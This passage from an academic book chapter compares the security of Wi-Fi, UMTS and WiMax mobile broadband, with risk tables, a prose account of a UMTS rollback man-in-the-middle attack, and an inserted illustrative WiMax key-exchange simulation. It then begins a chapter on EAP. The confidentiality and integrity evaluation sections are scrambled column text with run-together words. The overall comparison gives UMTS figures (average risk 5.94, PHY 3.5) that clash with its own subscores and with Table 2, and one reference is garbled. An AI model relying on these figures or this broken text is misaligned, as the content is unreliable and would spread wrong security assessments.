UMTS has been designed to be backwards compatible with GSM. It includes standardized security features in order to ensure world-wide interoperability and roaming. More specifically, GSM user parameters are derived from UMTS parameters using a set of predefined conversion functions. However, GSM subscribers roaming in 3GPP networks are supported by the GSM security context, which is vulnerable to the aforementioned GSM vulnerabilities.

Security Vulnerabilities

3G security has been significantly improved compared to GSM. However, there are still vulnerabilities related to the backwards compatibility with GSM. Meyer and Wetzel (2004a, 2004b) present a man-in-the-middle attack which can be mounted even if the subscriber utilizes a 3G enabled device within a 3G base station coverage. The described attack goes far beyond the anticipations of the 3GPP group. UMTS subscribers are vulnerable
to what 3GPP calls a “false base station attack” even if subscribers are roaming in a pure UMTS network and even though UMTS authentication is applied.

This attack can be categorized as a “roll-back attack.” This category of attacks exploits weaknesses of old versions of algorithms and protocols by means of the mechanisms defined to ensure backward compatibility of newer and stronger versions. According to this technique, the attacker acts on behalf of the victim’s mobile station in order to obtain a valid authentication token AUTN from any real network. It is assumed that the attacker has already retrieved the IMSI of the targeted subscriber, since the latter is sent in clear-text when establishing a TMSI. The attacker can capture the AUTN by initiating the AKA procedure with any legitimate network. The next step is to impersonate a valid GSM base station to the victim mobile station. The mobile station connects and verifies the rogue BS, since it possesses a valid AUTN. Subsequently, the rogue BS is configured
by the attacker to utilize “no encryption” or weak encryption. Finally, the attacker can send to the mobile station the GSM cipher mode command including the chosen encryption algorithm. The man-in-the-middle attack is mounted and the attacker can use passive or active eavesdropping without being detected.

WiMax

The IEEE 802.16 or broadband wireless access (BWA) Working Group was established in 1999 to prepare specifications for broadband wireless metropolitan area networks. The first 802.16 standard was approved in December 2001 and was followed by three amendments: 802.16a, 802.16b, and 802.16c. In 2004 the 802.16-2004 standard (IEEE-SA, 2006) was released and the earlier 802.16 documents including the a/b/c amendments were withdrawn. An amendment to the standard, 802.16e (IEEE-SA, 2006), addressing mobility was introduced in 2005. The main additions of 802.16e were low density parity check (LDPC) codes at the physical layer, enhanced MIMO setup functions, new states for MS operation, parameter-defined power saving classes of mobiles, and enhanced FFT sizes for scalable OFDMA.

WiMax aims at providing high data rate triple-play wireless services to fixed users, to nomadic users, and to users of mobile devices. It is based on a low latency quality of service (QoS) architecture in order to provide real-time multimedia services. It operates on the 2-6 GHz (IEEE 802.16e) and 10-66 GHz (IEEE 802.16-2004) frequency bands and it uses the OFDMA technology for modulation and medium access.

Security Architecture

WiMax has been designed with security in mind, especially after the serious vulnerabilities discovered in the original Wi-Fi security protocol. The IEEE 802.16 specifications include a security sublayer within the MAC layer. The IEEE 802.16 security architecture is based on the following issues:

• Authentication: The baseline authentication architecture, by default, employs a public key infrastructure (PKI) based on X.509 certificates. The base station (BS) validates the client’s certificate before permitting access to the physical layer (see Figure 3). First, the subscriber station (SS) sends to the BS an authorization request containing the certificate, the available security capabilities, and the security association identifier (SAID). The BS verifies the certificate and generates a 128 bit authentication key (AK). Then, the BS sends to the SS an authorization reply, which contains the AK encrypted with the SS’s public key, the AK’s lifetime, the selected security suite, and an AK sequence number. The SS uses its private key to recover the AK, which can now be utilized as an authentication token in further communication.
• Key exchange: The SS and the BS can agree on a transport encryption key (TEK), which will be utilized for data encryption (see Figure 3). The TEK is randomly generated by the BS. The AK established during authentication is used to derive two additional keys:
  ° Message authentication key (HMAC key), which is utilized to provide message integrity and AK confirmation during the key exchange process.
  ° Key encryption key (KEK), which is utilized for encrypting the TEK before sending it back to the SS. The modes for encrypting the TEK are:
    a. 3DES with a 112 bit KEK
    b. AES with a 128 bit KEK
    c. RSA using the SS’s public key
• Data encryption and integrity: The modes for implementing data privacy are:
  ° Data encryption standard (DES) with a 56 bit key and cipher block chaining (CBC), which utilizes the initialization vectors obtained during key exchange,
  ° AES with a 128 bit key and counter mode with cipher block chaining message authentication code protocol, which
provides message integrity and replay protection.

Figure 3. WiMax authentication and key exchange process
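The key exchange step of the procedure above, as an added example (not the chapter's code and not the IEEE 802.16 reference implementation): the AK is assumed to have already reached the SS through the RSA-protected authorization reply, the HMAC key and KEK are derived from the AK with an HMAC-SHA256 stand-in rather than the derivation the standard specifies, and the KEK wrap of the TEK is a keyed XOR mask standing in for 3DES/AES. What the code shows is the role of the two derived keys: the digest under the HMAC key is at once the integrity check and the AK confirmation, so a station that does not hold the AK cannot produce an acceptable key reply, and a key sequence number lets the receiver drop replays.

```python
import hashlib
import hmac
import os


def derive(key: bytes, label: bytes) -> bytes:
    """Stand-in key derivation (HMAC-SHA256, truncated to 128 bits). 802.16
    derives the HMAC key and KEK from the AK in its own way; not reproduced here."""
    return hmac.new(key, label, hashlib.sha256).digest()[:16]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wrap_tek(kek: bytes, key_seq: int, tek: bytes) -> bytes:
    """Stand-in for the 3DES/AES KEK wrap: XOR with a KEK-derived, per-sequence mask.
    Applying it twice unwraps, which the SS relies on below."""
    return xor(tek, derive(kek, b"wrap" + bytes([key_seq])))


class BaseStation:
    """BS side of the key exchange, starting from the AK shared during authorization."""

    def __init__(self, ak: bytes):
        self.hmac_key = derive(ak, b"HMAC_KEY")
        self.kek = derive(ak, b"KEK")
        self.key_seq = 0

    def key_reply(self, said: int, lifetime: int = 86400):
        """Key reply for one security association: a fresh TEK wrapped under the KEK,
        plus an HMAC digest over the message that doubles as AK confirmation.
        Returns (frame, tek); the tek is returned only so callers can check it."""
        tek = os.urandom(16)
        self.key_seq = (self.key_seq + 1) & 0xFF
        msg = (said.to_bytes(2, "big") + bytes([self.key_seq])
               + lifetime.to_bytes(4, "big") + wrap_tek(self.kek, self.key_seq, tek))
        digest = hmac.new(self.hmac_key, msg, hashlib.sha256).digest()
        return msg + digest, tek


class SubscriberStation:
    """SS side: accepts a key reply only if the digest proves the sender holds the
    same AK (AK confirmation), the message is intact, and the key sequence number
    has not been seen for this SA before (replay)."""

    def __init__(self, ak: bytes):
        self.hmac_key = derive(ak, b"HMAC_KEY")
        self.kek = derive(ak, b"KEK")
        self.seen = {}  # SAID -> set of accepted key sequence numbers

    def accept_key_reply(self, frame: bytes):
        msg, digest = frame[:-32], frame[-32:]
        expected = hmac.new(self.hmac_key, msg, hashlib.sha256).digest()
        if not hmac.compare_digest(digest, expected):
            return None  # modified in transit, or sent by a party without our AK
        said, key_seq = int.from_bytes(msg[:2], "big"), msg[2]
        if key_seq in self.seen.setdefault(said, set()):
            return None  # replayed key reply
        self.seen[said].add(key_seq)
        return wrap_tek(self.kek, key_seq, msg[7:23])  # unwrap: the wrapped TEK is bytes 7..22
```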
Security Vulnerabilities

WiMax supports unilateral device level authentication (Barbeau, 2005), which can be implemented in a similar way as Wi-Fi MAC filtering based on the hardware device address. Therefore, address sniffing and spoofing make a MS masquerade attack possible. In addition, the lack of mutual authentication makes a man-in-the-middle attack from a rogue BS possible. However, a successful man-in-the-middle attack is difficult because of the time division multiple access (TDMA) model in WiMax. The attacker must transmit at the same time as the legitimate BS using a much higher power level in order to “hide” the legitimate signal. Furthermore, WiMax supports mutual authentication at user network level based on the generic extensible authentication protocol (EAP) (Aboba, Blunk, Vollbrecht, Carlson, & Levkowetz, 2004). EAP variants, EAP-transport layer security (TLS) (X.509 certificate based) (Aboba & Simon, 1999) and EAP-subscriber identity module (SIM) (Haverinen & Salowey, 2004), are supported.

In the data privacy domain, the main security threat is the transmission of unencrypted management messages over the wireless link. Eavesdropping of management messages is a critical threat for
users and a major threat to a system. For example, an attacker could use this vulnerability to verify the presence of a victim at its location before perpetrating a crime. Additionally, it might be used by a competitor to map the network. Another major vulnerability is the encryption mode based on DES. The 56 bit DES key is easily broken by brute force with modern computers. Furthermore, the DES encryption mode includes no message integrity or replay protection functionality and is thus vulnerable to active or replay attacks. The secure AES encryption mode should be preferred over DES.

Finally, there is a potential for DoS attacks because authentication operations trigger the execution of long procedures. For example, a DoS attack could flood a MS with a high number of messages to authenticate. Due to low computational resources, the MS will not be able to handle a large amount of invalid messages, rendering the DoS attack successful.

Flash-OFDM

Fast low-latency access with seamless handoff orthogonal frequency division multiplexing (flash-OFDM) is an OFDM-based proprietary system which specifies the physical layer, as well as higher protocol stack layers. It is an all-IP technology and it aims to compete with GSM/3G networks. Already implemented flash-OFDM technology operating in the 450 MHz frequency band can offer a maximum download speed of 5.3 Mbps and an upload speed of 1.8 Mbps.

Design objectives have included the design of a high capacity physical layer, a packet-switched air interface, a contention-free and QoS-aware MAC layer, and efficient operation using existing Internet protocols. The air interface is designed and optimized across all protocol stack layers. Fast hopping across all tones in a pseudorandom predetermined pattern is employed. Channel coding and modulation are carried out on a per-segment basis and can be individually optimized for each channel. The ability to send segments of arbitrary size enables the MAC layer to perform efficient packet switching over the air interface. Given segments can be dedicated for use with predefined functionality. Thus there is no need to send overheads, such as message headers. Therefore, network layer traffic experiences small delays and no significant delay jitter.

Security Architecture

The security relies on “defence in depth,” that is, virtual private network (VPN) tunnelling and end-to-end encryption are used. Security specifications for flash-OFDM have not been presented in public (Lehtonen, Ahonen, Savola, Uusitalo, Karjalainen, Kuusela et al., 2006).

Security Analysis

A security analysis of the mobile broadband technologies Wi-Fi, UMTS, and WiMax is presented. Inclusion of flash-OFDM in this comparison is not possible because of the unavailability of public security specifications. Threats are analyzed with respect to the likelihood of occurrence, the impact on the network operation, and the global risk they represent. In the following paragraphs, we first describe in detail the evaluation and comparison methodology, and then a group of tables is presented in which the security threats of the investigated technologies are evaluated. Security threats are classified based on four main axes: authentication, confidentiality, integrity, and physical layer resilience. Finally, the security evaluations of the studied technologies are compared and presented in a concise overview table.

Methodology

The evaluation and comparison methodology was based on the method described by Barbeau (2005) and ETSI (2003). More specifically, three main criteria are considered: likelihood, impact, and risk. “Likelihood” refers to the probability that an attack associated with a specific threat is successfully launched. In this context, two variables are considered:

a. The technical difficulties of mounting the attack in terms of the required software, hardware, and estimated time duration.
b. The attacker’s motivation in terms of the level of network access or the severity of the system malfunction that the attack achieves.

Three levels of likelihood are available as described in Table 1. “Impact” refers to the consequences of an attack in terms of user and network security. The two variables of impact are:

a. User impact in terms of the severity of network access degradation.
b. System impact in terms of the severity of network degradation or outage.

Three levels of impact are available as described in Table 1. According to the level of likelihood and impact, numerical values from a predefined range are assigned to each criterion (see Table 1). For a specific threat, the “risk” refers to an overall threat level which is determined by the product of the likelihood value and the impact value.

Security threats which result in a high evaluated risk value are critical and additional measures should be taken to protect the network perimeter, whereas threats which have a low risk can be tolerated without employing countermeasures.

At this point, it is worth noting that this quantitative ranking is subjective. However, this is a useful evaluation and comparison methodology which can stimulate a structured discussion based on the evaluation criteria, that is, likelihood, impact, and risk. The comparison axes are authentication, confidentiality, integrity, and physical layer resilience.

Table 1. Evaluation and comparison methodology

Criteria    Cases     Variables                                        Rank
                      Difficulty                 Motivation
Likelihood  Unlikely  Strong                     Low                   1
            Possible  Solvable                   Reasonable            2
            Likely    None                       High                  3
                      User                       System
Impact      Low       Annoyance                  Very limited outages  1
            Medium    Loss of service            Limited outages       2
            High      Long time loss of service  Long time outages     3
Risk = Likelihood x Impact
Risk        Minor     No need for countermeasures                      1-3
            Major     Threat needs to be handled                       3-6
            Critical  High priority                                    6-9

Objective-Based Comparison

This section applies the aforementioned methodology to four main objectives of wireless security architectures: authentication, confidentiality, integrity, and physical layer resilience. For each objective, a thorough discussion describes the rationale behind the ranking of the security threats.

Authentication Evaluation

Wi-Fi includes four security threats which are all ranked to have a high impact on the system, since the attacker can exploit them to override the authentication checks or launch a combination of attacks which will grant him full network access. However, the likelihood ranking greatly varies. Closed system authentication and MAC filtering are very likely to be attacked by sniffing software which is readily available on the Internet. WEP attacks are more complicated, because a combination of software is required to induce and capture network traffic and then exploit the weak IVs in order to crack the key. WPA-PSK is even more difficult to break since it requires a brute force attack. The resilience of WPA-PSK is greatly dependent on the length and the complexity of the preshared key.

UMTS is far more resilient to authentication attacks, since most of the security gaps have been identified during the deployment of GSM and tackled in the specification design of UMTS. However, UMTS includes two main authentication vulnerabilities which can be exploited to launch a man-in-the-middle attack (high impact). The IMSI hijack threat refers to the deployment of a rogue BS in order to initiate an authentication procedure and steal the IMSI of a mobile user. The motivation for this attack is high, but the equipment is expensive and complicated to configure. AUTN capture is the second step of the attack and it refers to capturing an authentication token by masquerading as a MS.
AUTN capture assumes that the IMSI hijack attack has already been successfully launched. However, this attack does not require the deployment of a rogue BS and therefore it is more likely to happen.

In the WiMax architecture, the main security threat is the device-level authentication mode. When this mode is utilized without certificate support, it is as vulnerable as MAC filtering and it can be exploited to launch MS or BS masquerading attacks. A less critical vulnerability is the DoS attack which can be launched by flooding authentication requests. This attack mostly affects the MS due to its limited processing resources, but it is not a major threat since it has a medium impact and a low motivation.
have a high impact since it allows the reuse of the
Confidentiality Evaluation token retrieved by an AUTH capture attack and the
completion of the UMTS man-in-the-middle attack.
Wi-Fi includes some major vulnerabilities. It sup- However, it requires a prior successful launch of
portsanullmodeencryptionwhichisconfigured IMSI hijack and AUTN capture. Therefore it results
as default in the majority of the commercial access inahightechnicaldifficulty.
points. WEP encryption can provide an elementary WiMax supports two modes that can greatly
level of protection, but it is still too weak to keep compromiseinformationintegrity.Thefirstisthe
the intruders out. WPA-PSK offers a satisfactory DES mode which does not support integrity and
levelofconfidentiality,iflongandcomplex replaykeys
protection of data frames. The second is the
are utilized. The ranking of the Wi-Fi - confiden
null MAC mode for management frames, which can
tiality vulnerabilities is similar to authentication allowtheintrudertoinjectmodifiedmanagemen
ranking, since both objectives are based on the frames and affect the network operation.
same mechanisms.
UMTS incorporates strong encryption algo- Physical Layer Resilience Evaluation
rithms which have eliminated the deficiencies of
its predecessor GSM. Nevertheless, the backwards The resilience of the physical layer of each tech-
compatibility with GSM can be exploited to com- nology is evaluated with respect to jamming and
promise dual-band mobile devices by launching a scrambling. Jamming is achieved by introducing
man-in-the-middle attack. In this attack, the rogue a source of noise strong enough to significantly
BS can mandate the MS to use null mode encryp- reduce the capacity of the channel. Scrambling
tion or one of the GSM encryption modes which is similar to jamming, but it takes place for short
can be easily broken (Biham & Dunkelman, 2000; intervalsoftimeanditistargetedtospecificfra
Biryukov, Shamir, & Wagner, 2000). However, this or parts of frames.
is an unlikely attack since it requires the deploy- Wi-Ficomprisesofthethreedifferent - specifi
ment of a BS and a prior successful launch of the cations IEEE 802.11a/b/g which all utilize random
IMSI hijack and AUTN capture attacks. medium access techniques but operate on differ-
WiMax security architecture includes two main ent physical channels. IEEE 802.11a/g operate on
shortcomings. First of all, the DES encryption a 5 MHz OFDM channel, whereas IEEE 802.11b
modeprovidesaninadequatelevel - ofconfidential
operates on a 5 MHz DSSS channel. The DSSS
ity, since it can be easily broken. In addition, the is more resilient to narrowband jamming than
eavesdropping of unencrypted management frames OFDM and therefore jamming has a higher impact


on IEEE 802.11a/g. However, if the attacker wants to jam all the channels, the attacker has to jam a bandwidth of 40 MHz, which is quite difficult. Scrambling is easier to launch because of the random medium access layer.

UMTS operates on two 5 MHz DSSS channels, one for the uplink and one for the downlink. It is resilient to narrowband jamming because of the DSSS modulation, but it is still vulnerable to scrambling because of the random access.

WiMax operates on a 1.25-20 MHz OFDM channel and it employs TDMA techniques. Thus, it can be vulnerable to jamming, especially if it operates on a narrow channel, but it is resilient to scrambling due to the TDMA.

OVERALL COMPARISON

The results from the authentication, confidentiality, integrity, and physical layer resilience evaluation are presented in Table 2. The overall comparison results are as follows:

• Wi-Fi
  ° Authentication: 6.75
  ° Confidentiality: 6
  ° Integrity: 6
  ° PHY Resilience: 5
  ° AVERAGE RISK: 5.94
• UMTS
  ° Authentication: 4.5
  ° Confidentiality: 3
  ° Integrity: 3
  ° PHY Resilience: 3.5
  ° AVERAGE RISK: 5.94
• WiMax
  ° Authentication: 6.5
  ° Confidentiality: 6
  ° Integrity: 7.5
  ° PHY Resilience: 3
  ° AVERAGE RISK: 5.75

Wi-Fi has the highest average risk, which is quite reasonable because of the initial lack of security mechanisms in the Wi-Fi specification and the subsequent failure of WEP. WPA and WPA2 modes are much more secure, but the poor usability and the limited security awareness have constrained their wide deployment. UMTS proved to be quite robust by eliminating the security inefficiencies of its predecessor GSM. However, an attacker can still exploit some backward-compatibility issues to launch a man-in-the-middle attack. WiMax's performance was not satisfactory enough, mainly due to the provision of weak security modes. Nevertheless, the practical performance is greatly dependent on the actual security decisions of the network operators. These decisions vary according to the provided service requirements.

Table 2. Security evaluation

AUTHENTICATION EVALUATION
Technology   Threat                        Likelihood   Impact   Risk
Wi-Fi        Closed System                 3            3        9
             MAC Filtering                 3            3        9
             WEP                           2            3        6
             WPA-PSK                       1            3        3
             Average Risk                                        6.75
UMTS         IMSI Hijack                   2            3        6
             AUTN Capture                  1            3        3
             Average Risk                                        4.5
WiMAX        Device-level Authentication   3            3        9
             DoS on MS                     2            2        4
             Average Risk                                        6.5

CONFIDENTIALITY EVALUATION
Technology   Threat                        Likelihood   Impact   Risk
Wi-Fi        Null                          3            3        9
             WEP                           2            3        6
             WPA-PSK                       1            3        3
             Average Risk                                        6
UMTS         Rogue BS – Null / Weak        1            3        3
             Average Risk                                        3
WiMAX        DES mode                      3            3        9
             Management Frames             3            1        3
             Average Risk                                        6

INTEGRITY EVALUATION
Technology   Threat                        Likelihood   Impact   Risk
Wi-Fi        Null                          3            3        9
             WEP                           1            3        3
             Average Risk                                        6
UMTS         AUTN Replay                   1            3        3
             Average Risk                                        3
WiMAX        DES mode – Null integrity     3            2        6
             Management Frame – Null MAC   3            3        9
             Average Risk                                        7.5

PHYSICAL LAYER RESILIENCE EVALUATION
Technology   Threat                        Likelihood   Impact   Risk
Wi-Fi        Jamming (IEEE 802.11a/g)      2            3        6
             Scrambling (IEEE 802.11a/g)   3            3        9
             Jamming (IEEE 802.11b)        2            2        4
             Scrambling (IEEE 802.11b)     3            2        6
             Average Risk                                        5
UMTS         Jamming                       1            2        2
             Scrambling                    2            2        4
             Average Risk                                        2.5
WiMAX        Jamming                       1            3        3
             Scrambling                    1            3        3
             Average Risk                                        3



FUTURE TRENDS

Broadband wireless access networking is presently a rapidly evolving ICT area. Three important development trends can be identified:

• WiMax evolution for long range broadband wireless access.
• Development of a broadband wireless access technology supporting high speed mobility.
• Emerging 4G wireless cellular technology.

WiMax Evolution

The WiMax standard was finalized in June 2004. WiMax has the potential to change telecommunications as it is known today. "It eradicates the resource scarcity that has sustained incumbent service providers for the last century. As this technology enables a lower barrier to entry, it will allow true market-based competition in major telecommunications services like voice, video and data" (Ohrtman, 2005).

WiMax can offer a point-to-point range of 50 km with a throughput of 72 Mbps. The WiMax technology will make personal broadband services profitable to service providers and will be available to business and consumer subscribers at affordable prices. The first mobile WiMax products are expected to be introduced into the market in the first quarter of 2007. New technologies such as MIMO and beam forming for higher throughput and capacity will be introduced in 2007 (WiMax Forum, 2006).

Mobile Broadband Wireless Access (MBWA)

The IEEE 802.20 (or MBWA) Working Group was established on December 11, 2002, with the aim to develop a specification for an efficient packet-based air interface that is optimized for the transport of IP based services. The goal is to enable worldwide deployment of affordable, always-on, and interoperable BWA networks. The group will specify the lower layers of the air interface, operating in licensed bands below 3.5 GHz and enabling peak user data rates exceeding 1 Mbps at speeds of up to 250 km/h. A draft version of the specification was approved on January 18, 2006.

4G – Future Wireless Cellular Technology

Frameworks for future 4G networks, which seamlessly integrate heterogeneous mobile technologies in order to provide enhanced service integration, QoS, flexibility, scalability, mobility, and security, are currently being developed. However, these frameworks raise security vulnerabilities. An international consortium presents requirements and recommendations for the evolving 4G mobile networking technology (Akhavan, Vivek Badrinath, & Geitner, 2006). The 4G technology, which is in its infancy, is supposed to allow data transfer up to 100 Mbps outdoor and 1 Gbps indoor. The International Telecommunications Union (ITU) defines 4G as downlink throughput of 100 Mbps or more, and corresponding uplink speeds of at least 50 Mbps.

The 4G technology will support roaming for interactive services such as video conferencing. The cost of the data transfer will be comparatively low and global mobility will be possible. The networks will be all IPv6 networks. WLAN, 2.5G, 3G, and other networks such as SATCOM, WiMAX, and Bluetooth will be integrated in 4G networks. The antennas will be much smarter and improved access technologies like OFDM and MC-CDMA will be used. More efficient algorithms at the physical layer will reduce the inter-channel interference and cochannel interference.

Security Issues

Seamless convergence of heterogeneous wireless networks provides new security challenges for the research community. Global authentication architectures are needed which can operate independently of the wireless physical protocol. In addition, specifications are needed for maintaining the confidentiality and the integrity of the communication data while the user terminal is in a hand-off state. In this direction, a forum of mobile



operators called fixed mobile convergence alliance (FMCA) is working on defining specifications for the convergence of heterogeneous networks in the context of all IP 4G wireless systems.

Security policy issues are:

• The use of lightweight and flexible authentication, authorization, account, and audit (AAAA) schemes,
• The use of Trusted Computing (Reid, Nieto, & Dawson, 2003), and
• Different security policies for different services are recommended for 4G systems (Zheng, He, Xu, & Tang, 2005a).

Several security architecture proposals for 4G wireless systems have been made:

• Zheng, He, Yu, and Tang (2005b) propose a security architecture with:
  ° Network access security features.
  ° Network area security features for secure data exchange between network nodes.
  ° User area security features for secure access to ME/USIM.
  ° Application security for secure end-to-end data exchange.
• Integration of the SSL security protocol and a public key infrastructure is outlined and evaluated by Kambourakis, Rouskas, and Gritzalis (2004).
• A hierarchical trust model for 4G wireless networks is proposed by Zheng et al. (2005a).

CONCLUSION

In this chapter, the dominant mobile broadband technologies have been evaluated and compared based on their security performance. Three technologies were taken into consideration: Wi-Fi, UMTS, and WiMax. Their security architectures have been presented and analyzed in order to highlight the main security deficiencies. The evaluation and comparison methodology was based on assigning qualitative rankings to security threats with respect to the following criteria: likelihood, impact, and risk. The methodology was applied on four evaluation axes: authentication, confidentiality, integrity, and physical layer resilience. According to the comparison results, Wi-Fi is more liable to security attacks, followed by WiMax and UMTS. However, WiMax has not been widely tested under real-world systems due to its recent release. More security vulnerabilities may therefore be discovered in the future. Finally, the security architecture of UMTS is quite robust because of the lessons learned from GSM, but it is still not invincible against an experienced attacker with the right equipment.

REFERENCES

Aboba, B., Blunk, L., Vollbrecht, J., Carlson, J., & Levkowetz, H. (2004). Extensible authentication protocol (EAP) (IETF RFC 3748).

Aboba, B., & Simon, D. (1999). PPP EAP TLS authentication protocol (IETF RFC 2716).

Akhavan, H., Vivek Badrinath, V., & Geitner, T. (2006). Next generation mobile networks beyond HSPA & EVDO (White Paper. NGMN—Next generation mobile networks Ltd.). Retrieved April 24, 2007, from http://www.ngmn.org/

Baek, K., Smith, W., & Kotz, D. (2004). A survey of WPA and 802.11i RSN authentication protocols (Tech. Rep. TR2004-524). Dartmouth College, Computer Science.

Barbeau, M. (2005). WiMax/802.16 threat analysis. In Proceedings of the 1st ACM Workshop on QoS and Security for Wireless and Mobile Networks (Q2SWinet), Montreal, (pp. 8-15).

Biham, E., & Dunkelman, O. (2000). Cryptanalysis of the A5/1 GSM stream cipher. In Proceedings of the First International Conference on Progress in Cryptology (pp. 43-51).

Biryukov, A., Shamir, A., & Wagner, D. (2000). Real time cryptanalysis of A5/1 on a PC. Paper presented at the Fast Software Encryption Workshop 2000, New York.



Borisov, N., Goldberg, I., & Wagner, D. (2001). Intercepting mobile communications: The insecurity of 802.11. In Proceedings of the 7th Annual International Conference on Mobile Computing and Networking, Rome, (pp. 180-189).

Edney, J., & Arbaugh, W. A. (2003). Real 802.11 security: Wi-Fi protected access and 802.11i (1st ed.). Addison-Wesley Professional.

ETSI. (2003). Technical specification ETSI TS 6 1 2.80 1 V41 5- 6 .1 . 1 .

Haverinen, H., & Salowey, J. (2004). Extensible authentication protocol method for GSM subscriber identity modules (EAP-SIM) (Internet draft [work in progress]). Internet Engineering Task Force.

IEEE. (2001). IEEE standards for local and metropolitan area networks: Standard for port based network access control. IEEE Std 802.1x-2001. Retrieved April 24, 2007, from http://standards.ieee.org/getieee802/download/802.1X-2001.pdf

IEEE-SA. (2006). IEEE 802.16 LAN/MAN broadband wireless LANS. IEEE standards 802.16. Retrieved April 24, 2007, from http://standards.ieee.org/getieee802/802.16.html

Kambourakis, G., Rouskas, A., & Gritzalis, S. (2004). Performance evaluation of public key-based authentication in future mobile communication systems. EURASIP Journal on Wireless Communications and Networking, 1, 184-197.

Lehtonen, S., Ahonen, P., Savola, R., Uusitalo, I., Karjalainen, K., Kuusela, E., et al. (2006, September). Information security in wireless networks. Ministry of Transport and Communication. Finland: LUOTI Publications. ISBN 952-201-783-3. Retrieved April 24, 2007, from http://www.luoti.fi/material/InfoSec_in_WNetworks_final.pdf

Lynn, M., & Baird, R. (2002). Advanced 802.11 attack. Paper presented at the Black Hat 2002 Conference, Las Vegas. Retrieved April 24, 2007, from http://www.blackhat.com/presentations/bh-usa-02/baird-lynn/bh-us-02-lynn-802.11attack.ppt

Meyer, U., & Wetzel, S. (2004a). On the impact of GSM encryption and man-in-the-middle attacks on the security of interoperating GSM/UMTS networks. In Proceedings of IEEE International Symposium on Personal, Indoor and Mobile Radio Communications (PIMRC2004).

Meyer, U., & Wetzel, S. (2004b). A man-in-the-middle attack on UMTS. In Proceedings of ACM Workshop on Wireless Security (WiSe 2004).

Ohrtman, F. (2005). WiMax handbook. Building 802.16 wireless networks. McGraw-Hill Communications.

Reid, J., Nieto, J., & Dawson, E. (2003). Privacy and trusted computing. In Proceedings of the 14th International Workshop on Database and Expert Systems Applications (pp. 383-388).

Stanley, D., Walker, J., & Aboba, B. (2005). Extensible authentication protocol (EAP) method requirements for wireless LANs (IETF RFC 4017).

Stubblefield, A., Ioannidis, J., & Rubin, A. (2002). Using the Fluhrer, Mantin, and Shamir attack to break WEP. Paper presented at the NDSS.

Van de Wiele, T. (2005). Wireless security: Risks and countermeasures (UNISKILL Whitepaper).

Welch, D. J., & Lathrop, S. D. (2003). A survey of 802.11a wireless security threats and security mechanisms (Tech. Rep. ITOC-TR-2003-101). United States Military Academy.

WiMax Forum. (2006). Mobile WiMax—Part I: A technical overview and performance evaluation. Retrieved April 24, 2007, from http://www.wimaxforum.org/home/

Zheng, Y., He, D., Xu, L., & Tang, X. (2005a). Security scheme for 4G wireless systems. In Proceedings of the 2005 International Conference on Communications, Circuits and Systems (Vol. 1, pp. 397-401).

Zheng, Y., He, D., Yu, W., & Tang, X. (2005b). Trusted computing-based security architecture for 4G mobile networks. Paper presented at the Sixth International Conference on Parallel and Distributed Computing, Applications and Technologies PDCAT 2005 (pp. 251-255).



KEY TERMS

Authentication: Verification of the identity of a user or network node who claims to be legitimate.

Broadband: A network connection with a bandwidth of about 2 Mbps or higher.

Confidentiality: A cryptographic security service which allows only authorized users or network nodes to access information content.

EAP: Extensible authentication protocol (EAP) is an authentication protocol used with 802.1X to pass authentication information messages between a supplicant and an authentication server.

Integrity: A security service which verifies that stored or transferred information has remained unchanged.

UMTS: Universal mobile telecommunication system (UMTS) is a global third generation wireless cellular network for mobile telephony and data communication with a bandwidth up to 2 Mbps which can be upgraded up to 20 Mbps with high speed packet access (HSPA).

Wi-Fi: Wireless local area networking based on IEEE 802.11 standards.

WiMax: Wireless metropolitan area networking based on IEEE 802.16 standards.

WPA, WPA2: Wi-Fi protected access (WPA) is a protocol to secure wireless networks created to patch the previous security protocol WEP. WPA implements part of, and WPA2 implements the entire, IEEE 802.11i standard. In addition to authentication and encryption, WPA also provides improved payload integrity.




Chapter XLIX
Extensible Authentication (EAP) Protocol Integrations in the Next Generation Cellular Networks
Sasan Adibi
University of Waterloo, Canada

Gordon B. Agnew
University of Waterloo, Canada

ABSTRACT

Authentication is an important part of the authentication, authorization and accounting (AAA) schemes, and the extensible authentication protocol (EAP) is a universally accepted framework for authentication commonly used in wireless networks and point-to-point protocol (PPP) connections. The main focus of this chapter is the technical details to examine how EAP is integrated into the architecture of next generation networks (NGN), such as in worldwide interoperability for microwave access (WiMAX), which is defined in the IEEE 802.16d and IEEE 802.16e standards, and in current wireless protocols, such as IEEE 802.11i. This focus includes an overview of the integration of EAP with IEEE 802.1x, remote authentication dial in user service (RADIUS), DIAMETER, and pair-wise master key version 2 (PKMv2).

INTRODUCTION

Extensible authentication protocol (EAP) is a universally accepted authentication mechanism, frequently used in different wireless technologies. Although the applications of the EAP protocol are not limited to wireless local area networks (LANs), they could be used for authentication in wired-based LAN applications. However EAP is most often used in wireless LANs. The integrations of EAP and other security protocols and mechanisms often result in strong security frameworks.

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
Extensible Authentication (EAP) Protocol Integrations in the Next Generation Cellular Networks

These integrations are often established with other security protocols and mechanisms, such as transport layer security (EAP-TLS), message digest 5 (EAP-MD5), privacy key management (PKM-EAP), and so forth.

The organization of the sections of this chapter is as follows: Section II will discuss details about the EAP-IEEE 802.1x interactions. Section III is dedicated to remote authentication dial in user service (RADIUS) and DIAMETER in the authentication/authorization schemes. Section IV talks about the IEEE 802.1x-EAP functions implemented in Wi-Fi (IEEE 802.11i) and introductions to EAP-MD5, lightweight extensible authentication protocol (LEAP), EAP-TLS (TTLS) and protected extensible authentication protocol (PEAP). Section V presents the PKMv2-EAP scheme in worldwide interoperability for microwave access (WiMAX) (IEEE 802.16), followed by Section VI, which is a configured testbed for a WiMAX system. Sections VII and VIII contain conclusions and references respectively.

EAP AND IEEE 802.1x

Based on RFC 3748 (Aboba, Blunk, Vollbrecht, Carlson, & Levkowetz, 2004), EAP runs on top of IEEE 802.1x (Figure 1), therefore 802.1x is the key issue to understanding EAP. IEEE 802.1x offers a strong framework for authenticating and controlling user traffic for protecting networks. IEEE 802.1x also offers dynamically varying encryption keys. IEEE 802.1x uses EAP in both wired and wireless LANs and supports multiple authentication methods, such as Kerberos, one-time passwords, and public key certificates. Our main focus is on wireless technologies.

